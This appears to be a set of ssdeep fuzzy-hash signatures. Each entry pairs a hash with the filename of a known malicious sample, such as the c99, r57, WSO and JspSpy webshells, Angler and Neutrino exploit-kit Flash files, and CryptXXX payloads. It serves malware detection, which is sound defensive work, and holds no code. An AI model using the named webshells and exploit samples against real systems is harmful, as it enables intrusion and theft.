+1536:RGgTBz0K0xZmEX/ph8zOVdMMAV9zP5dVv1Nt/4:8guK0LnX/ph8zOVWL7RdXNtQ,"2016-07-28-pseudoDarkleech-Neutrino-EK-payload-CrypMIC-second-run.dll"
+1536:RDY3qdpBq6fgk9AbNieToJQmB45SO5Ogs4CD3KAkyYjiZbL3ShjRELkZaevf7ir2:R6qdpASgk9AbNieToJQmIB5OgsJD3KAs,"Backdoor.ASP.Kodlama.b.asp"
+1536:rCjWB9sTAzbmbEYKF/pIrDsQ/PtV92if3maF53ZOnPDOsrNW+n0LH2A0D5dXV:eWgsz+8BarD37jff3kPSsrw+n0LH2PV,"luoss.asp.txt"
+1536:Rb+5pQQr2aiWKIhuHULd7KWvr7RDPmLMzJ5Oh+T7b7NHKyD4gqm:RkpQQrIUuUdFj7RDPmAN5Oh+LJxD4K,"2016-05-25-Afraidgate-and-pseudoDarkleech-Angler-EK-flash-exploit-vs-flash-20.0.0.306.swf"
+1536:r9n7rWWwyd0R4FWDCObRDQlJGxSQtlCganLaffXpvpabziBHloV9Eav:RnJwaxI+Ot8/Gfl7swfZvprBF6z,"c697a44e50e9aab145ca9002e0469b23_php.txt.orig.001.001.001.001.001"
+1536:R7SilgMkuumrtjOxaHO7/x8GbEdNd9jJL5zqnJENnTZQDzkA:ReNMXrtjOxaHO7J8Gb+PlYMTZdA,"Powerpreter.psm1"
+1536:R6TYxYoPE6kJsjbsBjnZ8q41K1Il/bLgOPTCvptS:Hx51AsjbsY1TgOP3,"body.113.037"
+1536:r6TYxyaTwU+9n8x2NmD/K0DzAafmBX8vbGr+CvbKLer/KEWOrlGgnSPTCvXtS:FxXMmTKWfmBsvbGrHJGgnSPx,"body.113.083"
+1536:r6TYxXEzgwDZo5aIyv6IdcZH95Ve1OFrBaKL+H9vfDB2NL8n3uoIjCgnSPTCvbtt:FxmggZo5aIRIdcZFBaK69YNDfCgnSPZy,"body.113.254"
+1536:R6TYxXEU88WE9dDrbcO0slM5V0MPanH7muU1LMUYYuCvxBgIiyR8SlF3CagnyPTK:HxzLWE96OTH7md1LfzMWaE3CagnyPzy,"body.113.315"
+1536:R6TYxXEu0Iw/YgUfuUw5UP0UDBgeJzqSd0/Rd/4am86nYbIiDD+1SWba/caXgnSW:HxH0IeY1umPSXm5nD+UaXgnSPLy,"body.118.002"
+1536:r6TYxXEq8881TmLAP33I/NvqLMc71AOp1wOb8NCR4YRhyDQ4YnNCaab21vfSgnyg:Fx7L88rNvqP2AOkLDgdS4gnyP5y,"body.113.362"
+1536:r6TYxXE7w5T1UfBfXksUTuPdGrg97ba0mQH19qiFUJDgHutsuI62E0vjagnyPTCj:FxeLNXkNg97bai1fmiOSagnyP9y,"body.113.276"
+1536:R6TYxsEuw0vCHtPQyp5Wq7aJBPyxUY/oUErwZ0sCXW1B5y95rl0gnSPTCv9tKy:HxWLvoQixxLmpTJ0gnSPLy,"body.113.208"
+1536:r6TYxsErwBavIjbfw2fHqYRijh+8UCkxyIwrUY0O96ULOrl/gnSPTCvjtKy:FxjUKIjs2fHqYRijh+vq8fLJ/gnSPZy,"body.113.220"
+1536:r6TYxsEAwx3ZZRNaNUJwJ4KYJoj6rwWsDv7AgUKqOrl2gnSPTCvHtKy:FxY83ZZRgNUJwJuonZ5J2gnSPpy,"body.113.196"
+1536:r6TYxsEAwgN6xfTP1Baca3hwhrX36MrSlpcervPMv7OSnmp5rlEgnSPTCv/tKy:FxICT7aca36l6MrpofNJEgnSPhy,"body.113.192"
+1536:r6TYxsE1rwHQK0AsAGtoP+X0Y9HUoN4HbBwV1GDweecANSHw2NgnSPTCv7tKy:Fxtr4QK0AsAVYbN4H+AAMvNgnSPxy,"body.113.238"
+1536:R6TYxIoYtKpQ/EtKKWR7spjVcRSJ8OxjguPTCvm:HxXQ/EtKK7EuguPt,"body.113.031"
+1536:r6TYxIootqSAOEejT1MlM9rH94GWi+yguPTCvm:FxKAOEeaU+yguPt,"body.113.032"
+1536:r1Xfc+CSQMt0zke1jMnmKB7tSQQMfvPrDUALuVKll6FB0u4IzhN6cdw/96:e+Fvt0zke1omgxzfvPveKH6IuZzh7,"2016-08-22-EITest-Rig-EK-payload-Gootkit-after-best-remit.com.exe~"
+1536:QZ8kcLrHFypcFzlV/AMFnT4BGRzekn69yhOS:qcFypcFfoATkGZtn6AhD,"牛逼免杀提权隐藏大马 (1).asp"
+1536:QZ8kcLrHFypcFzlV/AMFnT4BGRzekn69yh1S:qcFypcFfoATkGZtn6AhM,"牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp"
+1536:qz0dQ6ynX33Yv3HevnADA81p6xGqaxXhNpT4KWgZYcI0OF:qz0UoGvcASAxG5THT4WYj0OF,"Resume.php.txt"
+1536:Qz09M5DM6Vnu8qyzR62FDcJ0Typd8FNP52lKjoW6knZ2i34:Qz1DvnEpSoajP16ZK4,"lpl38-com-redhat.asp.txt"
+1536:qWqRQGmsPzCAMw9J6Ux+0PA6r4TRDVAiuI:36FmG+UxntEFBhuI,"nst.txt"
+1536:qWqRQGmsPzCAMw9J6Ux+0PA6r4TRDVAiuB:36FmG+UxntEFBhuB,"nst.php"
+1536:QWA5yu0PsKC3LfLGm3CCBrLNs/3A7+Y5vPQZU63iiUbed5rCCnHbMiVd//sr:Q5yu0PsOG7VPQZUtu5W,"r.txt"
+1536:QVNwv9uox6fnnsoGFhyVYi30zwI4wijaCPgAkhrVOIk3gyk44gijt91kkYuLC6:qw6vnspKVT3fILTXAGAdo/KkYuLh,"2016-07-20-EITest-Neutrino-EK-flash-exploit-after-classical959.com.swf"
+1536:QUwVUmAGUL1FzNF018VzwiwBwJkqi8uDy7SrA8wOmqT9q8LUsIS9Fc3ti8VcED:QUOUmAGqpvVMDWfOmqT9qUUsI+G3b,"body.150"
+1536:QUwVUmAGUL1FzNA018VjajaYpvLfvexDI7OwOKr+9DS4PeIS9pc3gi8VcED:QUOUmAGqpQg+YpuDsTOKr+9DXPeI+a3w,"body.161"
+1536:QsfGnnYZGlVlXxV/fP/tOcr0sbNubU2E1T5luCrWFAIaN8RorbMU0yLgHj5+0fOM:XLZGlVlXxdfP/tzzbgbULbuPyLcjk0ft,"2016-03-18-page-from-1nationradio.com-with-malicious-script.txt"
+1536:QrBrA6QB6YsEW6oYTxBBqZWdpVBDHikEv9IDSg4azRV:qE6u6ooYTxBB0g4a7,"2016-06-29-page-from-marketingguerrilla.es-with-injected-script-to-afraidgate-redirect.txt"
+1536:QqeBbR9g8TRNsG8Y+TqoiLsRhZP51vUWqSTmt+EhHTS3KNVp0o95Z0ydVY/nOE:aBbR9g8EhZP51SSTmtWKynOE,"r57shell3.5.php"
+1536:/qNXIlisOzaWRNe2dzaWRNedp3n9cumC6bkWsEkpcZj:/jFJlMkWsgj,"jspspy_k8.jsp"
+1536:/qNXIlisazaWRNe2dzaWRNedp3n9cumC6bkWsEkpcX7:/jRJlMkWsK7,"jspspy_k8.jsp"
+1536:QMBJb68uxRHP5H7/gXAHZjilO+8OgcDVR4JjQSQ:j568uxRv5TMg+8Or,"phpRemoteView.php"
+1536:QM40Glrhpcc/pWjqSfCYQzIbu83qb3fsQdo59sVe3UM:XwBhpcckvC0qYIDG,"C99madShell v. 3.0.jpg"
+1536:QHhBeUrBWZJMw6/KvYuJNu23wN8hGp5Hzc21V5fE8:whBR9WDMv//yu2M7HzN1V5fE8,"c99shell-v1.0-build16-obf.php"
+1536:QgIAbvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfL:QgIAbvw60sWyB5Vx3ju1Ua9mE9x7CSls,"swift eb18.js"
+1536:qdPRQGmsPzCjvw9J6Ux+0PA6r4TRDVlpuv:KJFmO+UxntEFBvuv,"nstview.txt.001"
+1536:qdPRQGmsPzCjvw9J6Ux+0PA6r4TRDVlpu4:KJFmO+UxntEFBvu4,"nstview.txt"
+1536:qdPRQGmsPzCjvw9J6Ux+0PA6r4TRDVCpu5:KJFmO+UxntEFBUu5,"nsT View.php"
+1536:QaKaobvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyF:QaKaobvw60sWyB5Vx3ju1Ua9mE9x7CSu,"swift 881a.js"
+1536:QaGesGOawl/Z822JtuZHE8OoHR3JCzTCnNljUK:j3hD4Z82PE9Q3+sR,"b374k-2.6.php"
+1536:Q6TYxXESwB5vwr/ZvjudU6nB8dwGdTz5m8VYM2w+aLEWz5HWS4j9gnSPTCvEtKy:ux9djudRB8Lx5m8tN2d9gnSPiy,"body.113.251"
+1536:Q6TYxXEA88R8tO1Ufqg9q5vfwA6Yhu8YjIicgnyPTCvUtKy:uxFLR8tOWfCZ4NIicgnyPCy,"body.113.345"
+1536:q6TYxXEa88LYSFkweKZA7KUVKWhTD4HaOQm3qZkRicSx0VgnyPTCvutKy:sx3LLYSFkMUVKWhy1Cx0VgnyPUy,"body.113.334"
+1536:q6TYxsEiwnctCQXtBLnaR7yxOXAavUqc7/WnDePOrlRgnSPTCvatKy:sxq9tLLOmP2JRgnSP4y,"body.113.174"
+1536:q5zuqkGxam/RfKmjrf/EaHzYX9c8MF5HagA+Kucr:qlRxX/Rb7EaHzYt185W+Kua,"danush-2.php"
+1536:q4ax2YGNkGHogjt39KtwlukVt9JWHBS/q2/bnoDSSRi4UJMdxHykBzRyUdB1Jys:Wx2YGNk3gytC/RnoDSVixH,"r57shell-v1.31.php"
+1536:pxezJCfOjPfzk6E+KSKvVKnjb/fUBNgjhcz/o2KoKuBOrYMkDKCxDzyeelLr8mQd:pxezJaoDFKVvCn8Ng2boToKusmDKCxeO,"2016-02-05-Angler-EK-landing-page.txt"
+1536:PUwOrp3JUW1Fz/h01+tblBuPRVgDG7zKwOW909iyg6BIz2c3Xi8VcED:PUFrp3JPbLtnDKbOW909iF6BIzd3B,"body.134"
+1536:pRqaX8XDALENRKRkN7YL8hVtrsb//hl0q+MyhnLHf1lMFsRsX:TqaX8XDALiRKRkN7YL8Ltrsrhl0q+ph8,"火狐NEW WebShell.asp"
+1536:PP66qmM1kDQC0bQcW4RBuCYNbmnCyHwFUO06Xrzw/Sl6m1uqUUCZ9WaaCjs0sMJf:q6qmM1kUBuCYNbsw9rzw/SbCjs0cY,"r57shell v.1.42 - Edited By KingDefacer.php"
+1536:PN0ECHaMzewNIyOBPvEFKo5kC0D8p5aGVrLibfpwreG6jQuTHyt:PN0ECHaMzt0D8pTWbf6rUQuDC,"PHPJackal_by_Jackal.v1.9.php.txt"
+1536:/PKodxpUoFKvfYP5gcRMC5sElPgJqxaqCwtFg9T+WCkq:3KodxhFo45gXqsElRxamFTLkq,"2016-07-07-pseudoDarkleech-Neutrino-EK-payload-CryptXXX-after-drupatis.com-and-gennaroespositomilano.it.dll"
+1536:PkBFOyPrAM1W9Khrsr5jOtz+wuRTQga814DKb7SKF:MLOyPrAM1W9Khrs0uRTQ6GcR,"xinfo.php"
+1536:PFNACTBEcynNig2Hy5y8z5jt7JXUYsZqC+UZsvEjaUqCowI+263:P3A+vyNigd5y8zP7RUJPRx,"2016-06-15-Sundown-EK-landing-page-second-example.txt"
+1536:PEnKal6gQzjreP/cyaRUKmGmleJVN9qyVY4LwGCNSExDcLj0h+nLrIPL+pQQrnV0:Pal6dreP/cyaRUKmGmleJVN9qyVY4EHD,"传说中的草泥马4.0.asp"
+1536:PcBRQUmsPzCjvw9j6Ux+UPA6r4TRDVN3uz:UPxmOwUxXtEFBhuz,"nsTView-v2.0-gif.php"
+1536:pB9oaroKfvNL28HINhrcqJqRtxkdOJRAJM:dTvNL28HITgqJqRtxkdOJReM,"sql.php"
+1536:P9bpA2PR0r+4vg4QTHtNu/a6CtXECIHhvRYsUkY4bGf60ujizVf:P9bpPR0PwD8a6Ct/IB5YmbGf601f,"2016-07-26-Afraidgate-Neutrino-EK-flash-exploit-second-run.swf"
+1536:p6TYxXEQwDoW7C9ThXEWEa5cV+huqPnfH7H/VjZF+gnyPTCvRtKy:vxBnEWEocinJ+gnyPDy,"body.113.277"
+1536:P6TYxXElu88n1xFnddodCztC6H3QqLGf/XpCrCwo5QS4agnyPTCv7tKy:ZxwuL1ddodCztC6AqqfSagnyPpy,"body.113.308"
+1536:P6TYxXE9wQBnmj1S0cmGfDfSVJk/+83FZAVRPKTlIApE4IgnyPTCvDtKy:ZxEHBnmj6fDf3/lgLVoIgnyP9y,"body.128.001"
+1536:P6TYxsEqwxbUeb9ZkEBX1bV9V3VEFJaM+syML7POcdzEgQPt5rl6gnSPTCvPtKy:ZxSeb9ZkE7bUFJaM+GWBrJ6gnSP5y,"body.113.228"
+1536:p6TYxsEJwe9XKm5x69LKlUaZLz8FrK0HxL0NOrlHgnSPTCv1tKy:vxR7Km5x6gGvRJHgnSPzy,"body.113.156"
+1536:P6TYxsEGwBpztX9I01eDQ4t5rljgnSPTCvPtKy:ZxO4psJjgnSPJy,"body.113.169"
+1536:P6TYxsEdw151XBeU5TlrN9lZ1lnPYuPhg76x1Daj5rlGgnSPTCvjtKy:Zxlu51XkYlZlJtDmJGgnSPhy,"body.113.160"
+1536:p47n2AvGadS+yOBWPkuELK3CGR7gR+TqoiLsRpH51cpWLSTm8+EgerjDWx67UMpo:Cak4PH51XSTm85HS,"r57_by_kartal.v1.42.php.txt"
+1536:P16Vflk9hqOQ7QWHro5fssJyNDEvf3I6/8P36in/lDMN4J/1ZAa2rKiIv9cfowYD:PaC9heM+sMIpQ6IeN4JDtiIv9w6tnf,"404.asp"
+1536:oziX/1we57VlJoUn2IXFkBNd/eQDLvrsye7TbvT40EzAMjOSqoNY5+j0jNSGXP61:oziX/RhoUn2IVsd/eMrfe7M0EzAMjeoH,"明文版.asp"
+1536:ozCHO1EstFigfnGGrhJb4TUUD8v3zUYQLEgndyi34:ozpfiI0oUwv3T6EZK4,"加密版.asp"
+1536:oXsyVR53126aHbCj/IhuHULd7KWvr7RDPmLMzJ5OhxxpXFCkpG:ohVzF2zHeDUuUdFj7RDPmAN5OhVMKG,"2016-05-23-pseudo-Darkleech-Angler-EK-flash-exploit-vs-flash-20.0.0.306.swf"
+1536:owlU3XiaB+8pNPQZnlDK4QhSnCjPCIVJsbasIZbiMr/Rze:5UiY+alQr+pA9boZ9e,"2016-07-08-pseudoDarkleech-Neutrino-EK-flash-exploit-after-eielectronics.com.swf"
+1536:oUUQUPFjkVz8Ub7SilH5fccCX5X/3TDtZ1w43CZEM+0vYCgP:5kFjkv7Sw7CX5X/j5Z1w4SP++YCg,"functions57.php"
+1536:OU9rmm7F1lH2nsum0SCkTO9QaWvPBCrlqkX3fv:O4me92sPCkTOiaeZCZqU33,"angel.txt.001"
+1536:OU9rmm7F1lH2nsum0SCkTO9QaWvPBCrlqkX3fa:O4me92sPCkTOiaeZCZqU3S,"angel.php"
+1536:OrinKKDXZFMZc9ZgCMGJxRBH8VUdM3NujEjz51Rj8AKX1KCHCunPTe4TjoL1ytW0:Or5ZcIKXFJ,"2016-01-27-page-from-nachirobotics.com-with-malicious-script.txt"
+1536:oqIXg2lmJxWuCqmTizDdB2bpUKbnEj0Um:oZXg2lmJUuHmTiPOUyUm,"2016-06-21-page-from-jkanime.net-with-injected-Afraidgate-script.txt"
+1536:OPKodxpUoFKvfYP5gcRMC5sElPgJqx6UbU6Cbg9TcCkq:SKodxhFo45gXqsElRxZ/Cykq,"2016-07-07-EITest-Neutrino-EK-payload-CryptXXX-after-musicmix.co.dll"
+1536:OPiYQ4D5t4JMvJJOTWNcp+eRQEwiBo7WAW+:OZOTUcpFRVBkX,"WSO_by_pgemsin.v2.1.php.txt"
+1536:/oNXIlisOzaWRNe2dzaWRNedp3n9cumC6bkWsEkpcZj:/VFJlMkWsgj,"jspspy_k8.jsp"
+1536:OkHqbhEKH6BVN/Ly+WxpVBVONiT0NkFstM:cQBVN/Ly+WxpVLONiToM,"GFS web_shell ver 3.1.7.php"
+1536:oFCTWvsCpt4+Mhpqcp4pkpfpzpCkN3XTKgFeM1tX0i4lxL8C2JZ:oFCTMpt4pBWxL8T,"DAws.php"
+1536:oFb/gkXXMlidJzaWRNeWdzaWRNehEQOaczUKR7cuCOo+LkD1MuHySaYf9wnlXeP9:ox/mEZtIDGuHySaPan,"JspSpy_Private-0000.jsp"
+1536:oemiR2ooHbPpCHEIAPIotfI1HCiLgfOclJzcR0XZjs90wb:oeTR2DHbYqIR1iiLoOclJz1XZj20wb,"Backdoor.ASP.Ace.em-WebShell.v9.0.VIP漫步云端修改版.asp"
+1536:oEcLBLtakJDdC4LvVAJuII/lqCYy/qHXqoS1Pud7f:rc7JDdTZJ/lnqf,"Backdoor.ASP.Ace.cm-海阳顶端网ASP木马＠2006PLUS.asp"
+1536:odtf3QFvOMwwRkNWKGQV+Tqoi4T51aqWIgxMm+EEHTQH9A0KTW5k0xIVDm:odtoFvOMwwk8T51VgxMmfz,"SnIpEr_Shell_by_SnIpEr_SA.v1.31.php.txt"
+1536:oB8v3O3SmOYk0QkJo+1owSLq5KS+nch7QCAOGzW:oB8vSowSL/chFAOGzW,"2016-08-16-page-from-convoyproperty.com-with-injected-script-pointing-to-Neutrino-EK.txt"
+1536:o9LvFCD28fUcBS5sRhmjsQwkfZZJ4N4FX0OcB:o5MK8XBPGQwO4FX0O0,"m.zip"
+1536:o8sH5NXeV2t+WqHaMjKPjp6tpRCRxu4PCEqV4pUIPXw:ojTwKPjpCRCRJqERw,"filesman.txt"
+1536:O6TYxyarwyRfSPnVovw7cLn/+VucKEs0mdpCOrlignSPTCvytS:QxHVn/lJignSPc,"body.113.070"
+1536:O6TYxyaqwKube9Qq7+yZIzWNZripHgwwyUegCW/hAKF68EgBrldgnSPTCvOtKy:Qxuse9r7+yZIzWMHgwwxWSJdgnSP8y,"body.113.106"
+1536:O6TYxyaewksoKIWPo4UEE8n6enbW+O0U0GGBrlcgnSPTCvutS:QxKlsFPob1QOWJcgnSP0,"body.113.064"
+1536:O6TYxyaawt1N1XFGcuIMvMvhJ5QZya2kseM2uOT6gMBrlxgnSPTCvitS:Qxui1N11GcuHvMv5HaIJxgnSPg,"body.113.074"
+1536:O6TYxXEVw/bry5+RZrVMsUS9e2B7XSCSWwEjFgnSPTCvytKy:QxOR5+RZmsUAPFgnSPoy,"body.113.253"
+1536:o6TYxXEH9wrMU4oEug1CQDUD10X+bFuJvjyZpBdu5jYgnyPTCvEtKy:2x6924/CQAD6XYQQ+YgnyPuy,"body.113.262"
+1536:o6TYxXEe88oLyqiCI67x9UF8hTtxUVM9myGnEF4AjUgnyPTCvgtKy:2xlLoLBI67xOQJOSCBkUgnyPOy,"body.113.305"
+1536:O6TYxXE9w6PrHWCjHbUMc0V+QWX+SURpkgpT9vANVrRvjMgnyPTCvytKy:Qx8BUAVtR/qMgnyPEy,"body.113.266"
+1536:O6TYxsEawk4/v1zbznv2eDsASu3DFsmtE7xoFiB0nrlpgUaOrlWgnSPTCv6tKy:QxCR4n1fzOe/DCmtEMBJWgnSPYy,"body.113.198"
+1536:O6TYxsE9ww5xYpKc9xatFIvEUCY8rwgfEH9Ebfl5rlUgnSPTCv2tKy:QxVj5xYpKSvH6/JUgnSPoy,"body.113.167"
+1536:O6TYxsE0wOErsTbPXTU02QlYVcUiEAwpa34VgQ4/hOrl4gnSPTCvOtKy:QxMtTbPXTx2QlYVPiZwJ4gnSPMy,"body.113.200"
+1536:o4dHTmsfLDkgWtvxFps+q33rDj0XN3QHeS7FdDnvx/oUiU:ph6sf0VpW3rMN3H8rna4,"SPS-3.0免杀.php"
+1536:o/39tRskkG2PUqq10Aj/ZVAd/apf8F+2kT34rSWCob:qDRskkS/ZVAdd+2kT34rSWCob,"angel2013.txt.001.001.001"
+1536:o1JH+jmeXol3PT4DwCOgeiZHuGVvVAF3LEJ6nj:oz+/XF+,"Crystal.txt.001"
+1536:o1JH+jmeXol3PT4DwCOgeiZHuGVvVAF3LEJ6n2:oz+/XF9,"Crystal.txt"
+1536:NZsQWlgUDEX9+6bemopz9XhzMBjga5YAN4XyuMrtRh94Cy+6oHSFph0vQ:NJGgUDSvKjplhz/a5JoAteWPyDh0I,"2016-06-20-pseudoDarkleech-Neutrino-EK-flash-exploit-after-salentoeasy.it.swf"
+1536:nyOT7yklllllllllllllllllllllllllllllllllllllllllllllllllllllllly:ya0pKOL,"kb.txt.1"
+1536:ny6TYxXElQo88HU5XvEHEkAxYBnQTfhg4PcsIfHwi4yKe83x72cFPbjTbIgnyPTv:nExCQoLHpkwnecsIfHN9KTbIgnyPK3y,"body.113.353"
+1536:nwm6I//BTIwldIwyHaSCQDbo/ZoFe2TZ5IAbsS7RjfLgMqPEN4D9vUlFOwTNmWt:nbXZLmo2e8RbljfFqPNUlppmWt,"mumaasp.com.asp"
+1536:nuhsrQf9FgBEh5kjUiyqWY/z7IlRBESLbb9YL0:OvgBEh5beQ,"2016-05-19-EITest-Angler-EK-flash-exploit.swf"
+1536:nsNXIlipsjRzaWRNe2dzaWRNedOdnfcGmg6bkWsEKpcpT:n3ImfMkWsQT,"jspspy.txt"
+1536:nsNXIlidRzaWRNe2dzaWRNedONnfcGmQ6bkWsE0pcpT:nqI8dMkWsgT,"JspSpy1.jsp"
+1536:nsNXIlidRzaWRNe2dzaWRNedOnn9cum26bkWsEKpcpT:nqIWPMkWsQT,"JspSpyJDK51.jsp"
+1536:nsNXIlidRzaWRNe2dzaWRNedOdnfcGmg6bkWsEKpcpT:nqImfMkWsQT,"JspSpy.jsp"
+1536:nsNXIlidRzaWRNe2dzaWRNedO3n9cumm6bkWsE0pcpj:nqIY1MkWsgj,"JspSpyJDK5-other.jsp"
+1536:NRNsnCIIP+d66LvNGMvclJeIuWDfcswsGH8OEw0084:Nfso+6QoMviAqmsGcOEnx4,"2016-07-26-Afraidgate-Neutrino-EK-flash-exploit-first-run.swf"
+1536:npFmurQyNXRGcdAzibIRnpfsz9GnHcsCNDPPF/QEY1GWcGvD2kpdB:PmurQoBGKAzibYnqYHBCjnuGWcGvD7,"2016-08-16-pseudoDarkleech-Neutrino-EK-flash-exploit-after-blenheim-lodge.com.swf"
+1536:NLwYiXWNVI11T8HIghQJ6JqRt5ZdOJdK7:82I11T8HIsW6JqRt5ZdOJI7,"sql.php.php.txt"
+1536:NLGGGGG75dGC+lA0WAOXaSX7Xkh/U3dJ2uYEHt:hCsAfX8sP2VEHt,"r572.jpg"
+1536:NJTbvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfu2:NJTbvw60sWyB5Vx3ju1Ua9mE9x7CSlw3,"swift 5cd0.js"
+1536:niNXIlidRzaWRNe2dzaWRNedOdnfcGmg6bkWsEKpcpj:n0ImfMkWsQj,"JspSpy2009.jsp"
+1536:N/imjFJNKixotQrYNItwn6MOHYN482rs1Qcg9ptfkYjbV3/uoKc9htL4BoeRJIR1:N/impJNKixoSYN2uFV4bsecg9ptfkYjN,"asp-webshell-8.0.asp"
+1536:NiGmpqs6ao9Gpqhwgi46JmUs92I5kXDIfLvB36co:fmTIhz4mUs9J5ksrS,"index.txt"
+1536:NgzCIy+nBAmnVzk9k/iJG5HxipWN0DtDbvp:4lXOmnVztiJ0otD,"2016-05-28-and-31-KaiXin-EK-malware-payload.exe"
+1536:NgMg2LkEcpZqliEFfXOaPR4eDFRamRHeu6Rg7HhUyS6fOwoKZbUSYGeSbrDGs4ws:BLgsH6RSgSYGH45aTq,"JspSpy-myxx.jsp"
+1536:nCd/qXUS3tUTY/XuzzmFJI4mRLAQ2Yu+78yg6I1sWHnk9Ks5OGVunaa:CdypzvAGmRLSM7JI1fE9NOqyL,"2016-07-14-Afraidgate-Neutrino-EK-flash-exploit-example-1-of-4.swf"
+1536:NBWDA8cKTzBSXLB9WkJF8PR5Q/1608uVfawA5uSZlmtbWIdRZZrs/Nu7J:NSjnBSX9hFQvQPfax/mdaNu7J,"3560cb2629ded25ecfaab802a7c05923_php.txt"
+1536:NBLg6zUyL8cRgBSzvvKf2xBpbpo5G33vQ:7LgEzvvKf2xBpbpo5G33vQ,"2016-05-16-page-from-prg.usp.br-with-injected-EITest-script-first-run.txt"
+1536:narbtvhmFIAeUQRWjDPixz/AZz9tI7blBUsz1Wcvedgr1:natvhmyAeUQovw/AZz/YBLvedg,"vrtchpva.dll"
+1536:n9U4ZYdBLQ5Zag4z/RUUAOKh6HyN3i2D+SbZxlnppzZ/uHxeu:GdBLQTvk/OIKh6HvqTztls,"ASPXspy2.aspx"
+1536:n9U4ZYdBLQ5Zag4z/RUUAOKh6HyN3i2D+SbZxlnppzZ/uHxeSsT:GdBLQTvk/OIKh6HvqTztlP,"aspxspy2.txt"
+1536:n9U4qVdolQeZagItCLuATpgvuwvWQPUYtRiKw6nB/iTYjwzZl8nZNdiPaqeh:WdolQQvItCLuATpgvuwvW/VKw6n+rq6m,"专版aspx汗血宝马.aspx"
+1536:n9U4NAdBLQ5Zag4z/RUUAOKh6HyN3i2D+SbZxlnppzZ/uHxe9:udBLQTvk/OIKh6HvqTztlP,"aspx.aspx"
+1536:N9n7rWWwyd0R4FWDCObRDQlJGxSQtlCganLaffXpvpabziBHloV9EaF:bnJwaxI+Ot8/Gfl7swfZvprBF6p,"549ad2860d928533e044fe26575c3ca7_php.txt"
+1536:n7v7wCCg77/dD+GYnc7rTuGQ4qdjdjddaoamcnDfD68Ms98K3TL0oKw12sQvIk1b:n7v7w1g77F67c7nux4qJpdEojwPPF/3i,"uploader2.php"
+1536:n6TYxyFHwq/4O7YuFS4pfo2N8LlR5Xd2UZgY9tZqtjC7qZL5rlZgnSPTCvjtKy:BxOqO7YuFS4J8LlpVO1JZgnSPRy,"body.113.142"
+1536:N6TYxyaqwALAkfwAF5zgS52P/+ekWTejOaULm5PGIzRUBzmXxOrlTgnSPTCvFtKy:DxuHG+8pazUJTgnSPPy,"body.113.131"
+1536:N6TYxXEZ880YPJNUsPmUBl9seBoPKRVaw4/YgnyPTCvJtKy:DxAL0YPJes+UGem/YgnyP3y,"body.113.342"
+1536:N6TYxXEuwK07hyqjQQ5CV0b9SVjxAPNyjyqy85xMn+jkgnyPTCvVtKy:DxjJqjpC29AA2kgnyPry,"body.113.280"
+1536:n6TYxXESC88l0US9CrUOM1DCTvexFd8eUFHWwvri89d4p0Bl4F6gnyPTCv/tKy:BxBCLPU51DCTvexFmNjThP26gnyPJy,"body.113.296"
+1536:n6TYxXEQ88RO0DKzWD2laTnUP3bnuUh4ASagnyPTCvvtKy:BxDLRO5WClanagnyPty,"body.113.306"
+1536:n6TYxXEG88PIigK0ODq7mnGI60WdjKMmGq070jVgnyPTCv3tKy:BxVLPIP7mnGr4VgnyPJy,"body.113.304"
+1536:n6TYxXEcw1slRjbOgnBtUWRBhS8RZQYsYyajsgnyPTCvDtKy:BxBdRjbzn3LT3psgnyPRy,"body.125.001"
+1536:N6TYxXE388yPmEimoCbx8E/rdDQ/URsGeBrnJxUoCia7bvFsc6djfgnyPTCvhtKy:DxoLyx8E/tQrGmnJqSlfgnyPby,"body.113.293"
+1536:n6TYxsETwUhSgZy6vwFOCEhNj/JHX/VC8CC5/XYWnee6GOrl2gnSPTCvDtKy:Bxr7hRvwFOPHX/JYAYJ2gnSPFy,"body.113.173"
+1536:N6TYxsEPwxHpRtRka89j0Yvb444e/d1B1xqxcwgKtD2iXjGFxPrHZWa0ptMxR6Ug:Dxne/L89jP1TxqxcwlG7zGYGJggnSPny,"body.113.150"
+1536:N6TYxsEjwlmigPX3z1tnei9kSa0oThIohOrlLgnSPTCvptKy:DxL7XD1tnW4JLgnSPny,"body.113.207"
+1536:N6TYxsEDwZQTolWXZcy3cPAqTxR966iRbcn0ZX+fiM41LCihc4MYOrlFgnSPTCvd:DxL7XWPAqf9p0ZCwHWJFgnSPHy,"body.113.154"
+1536:n6TYxsEBwlKn/+1O+Z87I1D9L656qmsBEMP1UgGUcKEdybaZ3c5rlLgnSPTCv/tt:BxZ6Kng8uD1kZmIEMPd1lJLgnSPly,"body.113.193"
+1536:N62BibeHPiaQ6mfTV3RcHOh2DicL6vM+upD2a++o5+TSd9KKlqdwWX2q7gs9m8oW:N62BibevdQ6gB3RTCicuvMtNj+9+TicX,"priv95.php.txt"
+1536:n3E0dfdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:n5i,"good.php.5"
+1536:n2NUB3E3Nqw/G1o07D/r6yabOp3PKj9Gq6bCG76PQEI98S+MgVezQ1/u58eBndom:n2NUB3E3NFjYX6xbOp3PKj9Gq3k6PQEo,"b374k-2.3.php"
+1536:N1E0dfdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:N7i,"good.php.1"
+1536:n0NXIlidLzaWRNe2dzaWRNedpnn9cum26bkWsEKpcpT:niuxPMkWsQT,"cofigrue.jsp"
+1536:n0EPJdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:ni,"good.php.33"
+1536:MZTWwI9ZOhhhJef3bdjSsMhDFothwcvtY:yWfOhhhJyRjihSvy,"c99_madnet2.jpg"
+1536:mZng4mpZcAguJrAJkNfCJtTxHg3q3DCpMlpgP+RXOu3F:ygxJrAJofstTm31Mly2F,"r57_kartal2.jpg"
+1536:/m+VNIdshNkw6NjGdQnKZmjbyM7KTUuBp+1dR644NmQE490IPpy:OI6N9KbBp2RSxBy,"wso3.php"
+1536:/m+VNIdshNkw6NjGdQnKZmjbyM7KTUuBp+1dR644NmQE490IPp1:OI6N9KbBp2RSxB1,"wso_404.php"
+1536:mUvKAe80id3dzZ5bRqrgtS0iZOI7PMD0uihskJ9EXr5dU7x4ekCIvK+aR1lFWtTJ:mOj3dzZ5+gIOI7PMouf5dgVVWt+L0,"CTT Shell.php"
